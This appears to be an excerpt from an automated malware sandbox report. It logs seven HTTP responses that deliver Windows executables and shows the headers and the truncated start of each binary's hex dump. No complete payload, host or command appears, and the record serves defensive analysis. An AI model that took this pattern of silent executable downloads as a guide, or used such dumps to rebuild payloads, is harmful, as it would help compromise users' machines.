                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:24 GMTContent-Type: application/octet-streamContent-Length: 321536Last-Modified: Mon, 16 Sep 2024 13:46:13 GMTConnection: keep-aliveETag: "66e836a5-4e800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f2 26 e8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 0a 00 00 00 00 00 00 0e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 fa 04 00 57 00 00 00 00 00 05 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 7c f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 db 04 00 00 20 00 00 00 dc 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 08 06 00 00 00 00 05 00 00 08 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 fa 04 00 00 00 00 00 48 00 00 00 02 00 05 00 98 e9 04 00 e4 0f 00 00 03 00 02 00 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 c9 11 68 37 03 ef c9 ea 63 37 33 eb 0c 77 88 e8 56 29 4a 2e 3a 18 a0 61 ed 57 27 e2 3d e6 7c a4 94 a0 51 26 fe a7 b0 05 a7 70 e5 eb e9 0e 49 49 6f 4f 9a 0c e2 67 c5 f5 c5 96 51 c2 fb 08 50 b7 7e 43 4d 16 02 1d 76 40 8e 50 2a e4 ea 53 6c 93 7f 83 1b 61 3d 08 cb 3a 75 3f 45 44 bd 22 a1 f8 4a 70 d6 d5 f1 8a 8f c5 32 a7 96 72 1c 42 c6 a3 ea 48 be cc 98 82 3f b7 76 87 a7 30 5d 32 ae c1 1f e9 8c e5 3e f4 c3 46 cc 7d c9 73 36 0b 98 4e 0e 2e cf 88 68 f7 23 19 a5 c6 02 ab 5a 93 36 97 d9 67 5e 67 75 da 61 57 26 d1 8a 32 95 6e 3f ad 76 97 d9 b0 2a e0 53 88 cb 14 7d 85 21 d4 5e 14 a1 45 cc 68 aa 64 70 c0 d3 c5 a5 14 bf 66 63 34 7b d7 b5 d3 2f 4f aa ac 49 bd f5 84 b9 76 e1 51 2c 55 d4 d4 e2 3e 78 4b b6 ac 63 f5 44 ca 85 1b e6 2f 0e d4 45 37 2e 00 ae 54 1c e3 ad a6 f4 74 84 1a b1 d1 a8 90 b8 79 c2 cc c6 b6 66 87 82 53 43 e2 d6 18 de 29 fa 46 b3 6d cc 22 32 18 c4 a7 ea 4d 73 fb 33 22 4b 4c af 65 89 8c 7a 63 db 42 62 c3 2d 05 6c c3 5c 17 9e fe 01 d
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:27 GMTContent-Type: application/octet-streamContent-Length: 360448Last-Modified: Mon, 23 Sep 2024 14:42:37 GMTConnection: keep-aliveETag: "66f17e5d-58000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 3c 94 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 aa 04 00 00 d2 00 00 00 00 00 00 c0 d3 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8a e5 04 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 d0 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac e6 04 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dd a8 04 00 00 10 00 00 00 aa 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b1 29 00 00 00 c0 04 00 00 2a 00 00 00 ae 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 f0 00 00 00 f0 04 00 00 5e 00 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d0 48 00 00 00 f0 05 00 00 4a 00 00 00 36 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
